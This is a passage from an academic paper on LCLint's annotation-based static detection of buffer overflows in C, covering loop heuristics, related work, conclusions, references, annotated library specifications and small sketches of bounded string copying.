the postconditions of the loop predicate when the body executes would include the constraint ensures i < maxRead(buffer). This would match the pattern so LCLint could determine that the loop executes for maxRead(buffer) iterations.

Several other heuristics are used to match other common loop idioms used in C programs. We can generalize the first heuristic to cases where the initial index value is not known. If LCLint can calculate a reasonable upper bound on the number of iterations (for example, if we can determine that the initial value of the index is always non-negative), it can determine an upper bound on the number of loop iterations. This can generate false positives if LCLint overestimates the actual number of loop iterations, but usually gives a good enough approximation for our purposes.

Another heuristic recognizes a common loop form in which a loop increments and tests a pointer. Typically, these loops match the pattern:

    for (init; *buf; buf++)

A heuristic detects this loop form and assumes that the loop executes for maxRead(buf) iterations.

After estimating the number of loop iterations, we use a series of heuristics to generate reasonable constraints for the last iteration. To do this, we calculate the value of each variable in the last iteration. If a variable is incremented in the loop, we estimate that in the last iteration the variable is the sum of the number of loop iterations and the value of the variable in the first iteration. For the loop to be safe, all loop preconditions involving the variable must be satisfied for the values of the variable in both the first and last iterations. This heuristic gives satisfactory results in many cases.
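The first-and-last-iteration check amounts to simple arithmetic on these estimates. The sketch below illustrates that arithmetic and is not LCLint's code. The names are hypothetical, and the last value is estimated as the first value plus the estimated iteration count, as described above.

```c
#include <assert.h>
#include <stdbool.h>

/* Range of indices known to be safe, e.g. minRead..maxRead or minSet..maxSet. */
typedef struct {
    long lowest;
    long highest;
} IndexRange;

static bool in_range(IndexRange r, long index)
{
    return r.lowest <= index && index <= r.highest;
}

/* Estimated value of an incremented variable on the last iteration. */
long estimate_last_value(long first_value, long iterations)
{
    assert(iterations >= 0);
    return first_value + iterations;
}

/* Accept the access only if the first and the estimated last index are both in range. */
bool loop_access_accepted(IndexRange r, long first_value, long iterations)
{
    return in_range(r, first_value)
        && in_range(r, estimate_last_value(first_value, iterations));
}
```

For a buffer with maxRead equal to 9, a loop that starts at index 0 and is estimated to run 9 times is accepted, while an estimate of 10 iterations is rejected even if the real loop would have stopped earlier. This is the source of the false positives mentioned above.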
Our heuristics were initially developed based on our analysis of wu-ftpd. We found that our heuristics were effective for BIND also. To handle BIND, a few additional heuristics were added. In particular, BIND frequently used comparisons of pointer addresses to ensure a memory access is safe. Without an appropriate heuristic, LCLint generated spurious warnings for these cases. We added appropriate heuristics to handle these situations correctly. While we expect experience with additional programs would lead to the addition of new loop heuristics, it is encouraging that only a few additional heuristics were needed to analyze BIND.

Although no collection of loop heuristics will be able to correctly analyze all loops in C programs, our experience so far indicates that a small number of loop heuristics can be used to correctly analyze most loops in typical C programs. This is not as surprising as it might seem: most programmers learn to code loops from reading examples in standard texts or other people’s code. A few simple loop idioms are sufficient for programming many computations.

Related Work

In Section 2, we described run-time approaches to the buffer overflow problem. In this section, we compare our work to other work on static analysis.

It is possible to find some program flaws using lexical analysis alone. Unix grep is often used to perform a crude analysis by searching for potentially unsafe library function calls. ITS4 is a lexical analysis tool that searches for security problems using a database of potentially dangerous constructs [VBKM00]. Lexical analysis techniques are fast and simple, but their power is very limited since they do not take into account the syntax or semantics of the program.

More precise checking requires a deeper analysis of the program. Our work builds upon considerable work on constraint-based analysis techniques. We do not attempt to summarize foundational work here. For a summary see [Aiken99].
Proof-carrying code [NL96, Necula97] is a technique where a proof is distributed with an executable and a verifier checks the proof guarantees the executable has certain properties. Proof-carrying code has been used to enforce safety policies constraining readable and writeable memory locations. Automatic construction of proofs of memory safety for programs written in an unsafe language, however, is beyond current capabilities.

Wagner, et al. have developed a system to statically detect buffer overflows in C [WFBA00, Wagner00]. They used their tool effectively to find both known and unknown buffer overflow vulnerabilities in a version of sendmail. Their approach formulates the problem as an integer range analysis problem by treating C strings as an abstract type accessed through library functions and modeling pointers as integer ranges for allocated size and length. A consequence of modeling strings as an abstract data type is that buffer overflows involving non-character buffers cannot be detected. Their system generates constraints similar to those generated by LCLint for operations involving strings. These constraints are not generated from annotations, but constraints for standard library functions are built in to the tool. Flow insensitive analysis is used to resolve the constraints. Without the localization provided by annotations, it was believed that flow sensitive analyses would not scale well enough to handle real programs. Flow insensitive analysis is less accurate and does not allow special handling of loops or if statements.

Dor, Rodeh and Sagiv have developed a system that detects unsafe string operations in C programs [DRS01]. Their system performs a source-to-source transformation that instruments a program with additional variables that describe string attributes and contains assert statements that check for unsafe string operations.
The instrumented program is then analyzed statically using integer analysis to determine possible assertion failures. This approach can handle many complex properties such as overlapping pointers. However, in the worst case the number of variables in the instrumented program is quadratic in the number of variables in the original program. To date, it has only been used on small example programs.

Wagner’s prototype has been used effectively to find both known and previously unknown buffer overflow vulnerabilities in sendmail. Wagner’s prototype is known to scale to fairly large applications. Versions of LCLint without buffer overflow checking scaled to very large applications. The nature of our modifications suggests that our version of LCLint would continue to scale to very large applications.

Wagner’s tool does not require adding annotations. This makes the up-front effort required to use the tool less than that required in order to use LCLint. However, human evaluation of error messages is by far the most time consuming part of program analysis. As with LCLint, Wagner’s prototype produces a large number of spurious messages, and it is up to the programmer to determine which messages are spurious. If a large amount of time is spent on human analysis, the additional time spent on adding annotations is not likely to be significant. A process of human input and repeated checking may actually be faster than simply generating less accurate error messages.

A few tools have been developed to detect array bounds errors in languages other than C. John McHugh developed a verification system that detects array bounds errors in the Gypsy language [McHugh84]. Extended Static Checking uses an automatic theorem-prover to detect array index bounds errors in Modula-3 and Java [DLNS98]. Extended Static Checking uses information in annotations to assist checking.
Detecting array bounds errors in C programs is harder than for Modula-3 or Java, since those languages do not provide pointer arithmetic.

Conclusions

We have presented a lightweight static analysis tool for detecting buffer overflow vulnerabilities. It is neither sound nor complete; hence, it misses some vulnerabilities and produces some spurious warnings. Despite this, our experience so far indicates that it is useful. We were able to find both known and previously unknown buffer overflow vulnerabilities in wu-ftpd and BIND with a reasonable amount of effort using our approach. Further, the process of adding annotations is a constructive and useful step for understanding a program and improving its maintainability.

We believe it is realistic (albeit perhaps optimistic) to believe that programmers would be willing to add annotations to their programs if they are used to efficiently and clearly detect likely buffer overflow vulnerabilities (and other bugs) in their programs. An informal sampling of tens of thousands of emails received from LCLint users indicates that about one quarter of LCLint users add the annotations supported by previously released versions of LCLint to their programs. Perhaps half of those use annotations in sophisticated ways (and occasionally in ways the authors never imagined). Although the annotations required for effectively detecting buffer overflow vulnerabilities are somewhat more complicated, they are only an incremental step beyond previous annotations. In most cases, and certainly for security-sensitive programs, the benefits of doing so should far outweigh the effort required.

These techniques, and static checking in general, will not provide the complete solution to the buffer overflow problem. We are optimistic, though, that this work represents a step towards that goal.

Availability

LCLint source code and binaries for several platforms are available from http://lclint.cs.virginia.edu.
Acknowledgements

We would like to thank the NASA Langley Research Center for supporting this work. David Evans is also supported by an NSF CAREER Award. We thank John Knight, John McHugh, Chenxi Wang, Joel Winstead and the anonymous reviewers for their helpful and insightful comments.

References

[Aiken99] Alexander Aiken. Introduction to Set Constraint-Based Program Analysis. Science of Computer Programming, Volume 35, Numbers 2-3. November 1999.
[AlephOne96] Aleph One. Smashing the Stack for Fun and Profit. BugTraq Archives. http://immunix.org/StackGuard/profit.html.
[Andrews01] Mark Andrews. Personal communication, May 2001.
[BST00] Arash Baratloo, Navjot Singh and Timothy Tsai. Transparent Run-Time Defense Against Stack-Smashing Attacks. 9th USENIX Security Symposium, August 2000.
[Collins88] William J. Collins. The Trouble with For-Loop Invariants. 19th SIGCSE Technical Symposium on Computer Science Education, February 1988.
[Coolbaugh99] Liz Coolbaugh. Buffer Overflow Protection from Kernel Patches. Linux Weekly News, http://lwn.net/1999/1230/security.php3.
[Cousot77] Patrick Cousot and Radhia Cousot. Abstract Interpretation: A Unified Lattice Model for Static Analysis of Programs by Construction or Approximation of Fixpoints. Fourth ACM Symposium on Principles of Programming Languages, January 1977.
[CPMH+98] Crispin Cowan, Calton Pu, David Maier, Heather Hinton, Peat Bakke, Steve Beattie, Aaron Grier, Perry Wagle and Qian Zhang. Automatic Detection and Prevention of Buffer-Overflow Attacks. 7th USENIX Security Symposium, January 1998.
[CBDP+99] Crispin Cowan, Steve Beattie, Ryan Finnin Day, Calton Pu, Perry Wagle and Erik Walthinsen. Protecting Systems from Stack Smashing Attacks with StackGuard. Linux Expo. May 1999. (Updated statistics at http://immunix.org/StackGuard/performance.html)
[CWPBW00] Crispin Cowan, Perry Wagle, Calton Pu, Steve Beattie and Jonathan Walpole. Buffer Overflows: Attacks and Defenses for the Vulnerability of the Decade.
DARPA Information Survivability Conference and Exposition. January 2000.
[DLNS98] David Detlefs, K. Rustan M. Leino, Greg Nelson and James B. Saxe. Extended Static Checking. Research Report, Compaq Systems Research Center. December 18, 1998.
[DRS01] Nurit Dor, Michael Rodeh and Mooly Sagiv. Cleanness Checking of String Manipulations in C Programs via Integer Analysis. 8th International Static Analysis Symposium. To appear, July 2001.
[ES99] Úlfar Erlingsson and Fred B. Schneider. SASI Enforcement of Security Policies: A Retrospective. New Security Paradigms Workshop. September 1999.
[ES00] Úlfar Erlingsson and Fred B. Schneider. IRM Enforcement of Java Stack Inspection. IEEE Symposium on Security and Privacy. May 2000.
[ECGN99] Michael D. Ernst, Jake Cockrell, William G. Griswold and David Notkin. Dynamically Discovering Likely Program Invariants to Support Program Evolution. International Conference on Software Engineering. May 1999.
[EGHT94] David Evans, John Guttag, Jim Horning and Yang Meng Tan. LCLint: A Tool for Using Specifications to Check Code. SIGSOFT Symposium on the Foundations of Software Engineering. December 1994.
[Evans96] David Evans. Static Detection of Dynamic Memory Errors. SIGPLAN Conference on Programming Language Design and Implementation. May 1996.
[ET99] David Evans and Andrew Twyman. Flexible Policy-Directed Code Safety. IEEE Symposium on Security and Privacy. May 1999.
[Evans00a] David Evans. Policy-Directed Code Safety. MIT PhD Thesis. February 2000.
[Evans00b] David Evans. Annotation-Assisted Lightweight Static Checking. First International Workshop on Automated Program Analysis, Testing and Verification. June 2000.
[Evans00c] David Evans. LCLint User’s Guide, Version 2.5. May 2000. http://lclint.cs.virginia.edu/guide/
[FBF99] Timothy Fraser, Lee Badger and Mark Feldman. Hardening COTS Software with Generic Software Wrappers. IEEE Symposium on Security and Privacy. May 1999.
[GWTB96] Ian Goldberg, David Wagner, Randi Thomas and Eric A.
Brewer. A Secure Environment for Untrusted Helper Applications: Confining the Wily Hacker. 6th USENIX Security Symposium. July 1996.
[GH93] John V. Guttag and James J. Horning, editors, with Stephen J. Garland, Kevin D. Jones, Andrés Modet and Jennette M. Wing. Larch: Languages and Tools for Formal Specification. Springer-Verlag. 1993.
[IS97] A. Ireland and J. Stark. On the Automatic Discovery of Loop Invariants. 4th NASA Langley Formal Methods Workshop. September 1997.
[ISO99] ISO/IEC 9899 International Standard. Programming Languages – C. December 1999. Approved by ANSI May 2000.
[LHSS00] David Larochelle, Yanlin Huang, Avneesh Saxena and Seejo Sebastine. Static Detection of Buffer Overflows in C using LCLint. Unpublished report available from the authors. May 2000.
[Luckin01] Bob Luckin. Personal communication, April 2001.
[Lundberg01] Gregory A Lundberg. Personal communication, April 2001.
[McHugh84] John McHugh. Towards the Generation of Efficient Code from Verified Programs. Technical Report 40, Institute for Computing Science, University of Texas at Austin PhD Thesis, 1984.
[Necula97] George C. Necula. Proof-Carrying Code. 24th ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, January 1997.
[NL96] George C. Necula and Peter Lee. Safe Kernel Extensions Without Run-Time Checking. 2nd Symposium on Operating Systems Design and Implementation, October 1996.
[Orcero00] David Santo Orcero. The Code Analyzer LCLint. Linux Journal. May 2000.
[Pethia00] Richard D. Pethia. Bugs in Programs. Keynote address at SIGSOFT Foundations of Software Engineering. November 2000.
[PG00] Pramode C E and Gopakumar C E. Static Checking of C programs with LCLint. Linux Gazette Issue 51. March 2000.
[RE89] Jon Rochlis and Mark Eichin. With Microscope and Tweezers: the Worm from MIT’s Perspective. Communications of the ACM. June 1989.
[Snow99] Brian Snow. Future of Security. Panel presentation at IEEE Security and Privacy. May 1999.
[Spafford88] Eugene Spafford.
The Internet Worm Program: An Analysis. Purdue Tech Report 832. 1988.
[SI98] J. Stark and A. Ireland. Invariant Discovery Via Failed Proof Attempts. 8th International Workshop on Logic Based Program Synthesis and Transformation. June 1998.
[Torvalds98] Linus Torvalds. Message archived in Linux Weekly News. August 1998. http://lwn.net/980806/a/linus-noexec.html
[VBKM00] John Viega, J.T. Bloch, Tadayoshi Kohno and Gary McGraw. ITS4: A Static Vulnerability Scanner for C and C++ Code. Annual Computer Security Applications Conference. December 2000.
[WFBA00] David Wagner, Jeffrey S. Foster, Eric A. Brewer and Alexander Aiken. A First Step Towards Automated Detection of Buffer Overrun Vulnerabilities. Network and Distributed System Security Symposium. February 2000.
[Wagner00] David Wagner. Static Analysis and Computer Security: New Techniques for Software Assurance. University of California, Berkeley, PhD Thesis, 2000.
[WLAG93] Robert Wahbe, Steven Lucco, Thomas E. Anderson and Susan L. Graham. Efficient Software-Based Fault Isolation. 14th ACM Symposium on Operating Systems Principles, 1993.
[Wegbreit75] Ben Wegbreit. Property Extraction in Well-Founded Property Sets. IEEE Transactions on Software Engineering, September 1975.
[WSJ01] The Wall Street Journal. Researchers Find Software Flaw Giving Hackers Key to Web Sites. January 30, 2001.

A. Annotated Selected C Library Functions

    char *strcpy (char *s1, char *s2)
      /*@requires maxSet(s1) >= maxRead(s2)@*/
      /*@ensures maxRead(s1) == maxRead (s2) /\ result == s1@*/;

    char *strncpy (char *s1, char *s2, size_t n)
      /*@requires maxSet(s1) >= n - 1@*/
      /*@ensures maxRead (s1) <= maxRead(s2) /\ maxRead (s1) <= (n - 1) /\ result == s1@*/;

    char *strcat (char *s1, char *s2)
      /*@requires maxSet(s1) >= (maxRead(s1) + maxRead(s2))@*/
      /*@ensures maxRead(s1) == maxRead(s1) + maxRead(s2) /\ result == s1@*/;

    char *strncat (char *s1, char *s2, int n)
      /*@requires maxSet(s1) >= maxRead(s1) + n@*/
      /*@ensures maxRead(result) >= maxRead(s1) + n@*/;

    extern size_t strlen (char *s)
      /*@ensures result == maxRead(s)@*/;

    void *calloc (size_t nobj, size_t size)
      /*@ensures maxSet(result) == nobj@*/;

    void *malloc (size_t size)
      /*@ensures maxSet(result) == size@*/;

These annotations were determined based on the ISO C standard [ISO99]. Note that the semantics of strncpy and strncat are different: strncpy writes exactly n characters to the buffer but does not guarantee that a null character is added; strncat appends n characters to the buffer and a null character. The ensures clauses reveal these differences clearly.

The full specifications for malloc and calloc also include null annotations on the result that indicate that they may return NULL. Existing LCLint checking detects dereferencing a potentially null pointer. As a result, the implicit actual postcondition for malloc is maxSet(result) == size \/ result == null. LCLint does not support general disjunctions, but possibly NULL values can be handled straightforwardly.

[1] We can trivially reduce the halting problem to the buffer overflow detection problem by inserting code that causes a buffer overflow before all halt instructions.
[2] The original Larch C interface language LCL [GH93], on which LCLint’s annotation language was based, did include a notion of general preconditions and postconditions specified by requires and ensures clauses.
[3] LCLint also supports a nullterminated annotation that denotes storage that is terminated by the null character. Many C library functions require null-terminated strings, and can produce buffer overflow vulnerabilities if they are passed a string that is not properly null-terminated. We do not cover the nullterminated annotation and related checking in this paper. For information on it, see [LHSS00].
[4] The standard library specification of strcpy also includes other LCLint annotations: a modifies clause that indicates that the only thing that may be modified by strcpy is the storage referenced by s1, an out annotation on s1 to indicate that it need not point to defined storage when strcpy is called, a unique annotation on s1 to indicate that it may not alias the same storage as s2, and a returned annotation on s1 to indicate that the returned pointer references the same storage as s1. For clarity, the examples in this paper show only the annotations directly relevant to detecting buffer overflow vulnerabilities. For more information on other LCLint annotations, see [Evans96, Evans00c].
[5] The source code for wu-ftpd is available from http://www.wu-ftpd.org. We analyzed the version in ftp://ftp.wu-ftpd.org/pub/wu-ftpd-attic/wu-ftpd-2.5.0.tar.gz. We configured wu-ftpd using the default configuration for FreeBSD systems. Since LCLint performs most of its analyses on code that has been pre-processed, our analysis did not examine platform-specific code in wu-ftpd for platforms other than FreeBSD.
[6] For our prototype implementation, we have not yet attempted to produce messages that can easily be interpreted by typical programmers. Instead, we generate error messages that reveal information useful to the LCLint developers. Generating good error messages is a challenging problem; we plan to devote more effort to this before publicly releasing our tool.
[7] Because strncpy does not guarantee null termination, it is necessary to explicitly put a null character at the end of the buffer.
[8] Advisories for this vulnerability can be found at http://www.cert.org/advisories/CA-1999-13.html and ftp://www.auscert.org.au/security/advisory/AA-1999.01.wu-ftpd.mapping_chdir.vul.
[9] The source code is available at ftp://ftp.isc.org/isc/bind/src/8.2.2-P7/bind-src.tar.gz
[10] An advisory for this vulnerability can be found at http://lwn.net/2001/0201/a/covert-bind.php3.
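
As a sketch of the idiom described in footnote [7] and of the strncpy and strncat specifications in Appendix A, the following helpers keep both calls within a fixed-size buffer. The names bounded_copy and bounded_append and the dst_size parameter are hypothetical; dst_size is assumed to be the number of bytes allocated for dst, so that maxSet(dst) is dst_size - 1.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy src into dst without writing past dst[dst_size - 1].
   strncpy may leave dst unterminated, so the last byte is set
   to the null character explicitly. */
char *bounded_copy(char *dst, size_t dst_size, const char *src)
{
    assert(dst_size > 0);
    strncpy(dst, src, dst_size - 1); /* n - 1 <= maxSet(dst) holds */
    dst[dst_size - 1] = '\0';
    return dst;
}

/* Append src to the string already in dst. strncat writes up to n
   characters plus a null, so n is limited to the space remaining
   after the current contents and the final null. */
char *bounded_append(char *dst, size_t dst_size, const char *src)
{
    size_t used = strlen(dst);
    assert(used < dst_size);         /* dst must already be terminated */
    strncat(dst, src, dst_size - 1 - used);
    return dst;
}
```

With a 6-byte buffer, copying a longer string keeps only its first five characters, and appending to "ab" adds at most three more.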